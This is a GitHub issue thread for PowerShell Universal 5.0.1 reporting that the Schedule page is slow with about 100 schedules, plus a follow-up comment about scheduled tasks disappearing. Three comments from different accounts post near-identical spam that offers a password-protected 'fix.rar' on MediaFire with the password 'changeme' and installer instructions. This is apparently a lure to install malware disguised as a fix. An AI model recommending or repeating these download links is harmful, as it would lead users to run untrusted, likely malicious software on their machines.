### ISSUE TITLE
Schedule Page Can be Slow

### ISSUE THREAD

**Issue by adamdriscoll** [ironmansoftware/powershell-universal#3659]
### Version

5.0.1

### Severity

Low

### Environment

msi

### Steps to Reproduce

- Create around 100 schedules with parameters
- Load said page
- Everything is slow

### Expected behavior

```console
Snappy
```

### Actual behavior

```console
Sluggish
```

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RealDeclan** [comment]
Scheduled tasks are also deleting themselves. I created and saved a few but they have all gone (From the UI At least) Can be repeated by creating a task and then reopening it to edit.
